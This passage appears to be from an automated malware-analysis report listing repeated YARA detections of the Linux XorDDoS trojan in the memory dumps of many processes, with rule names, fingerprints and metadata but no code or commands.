        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
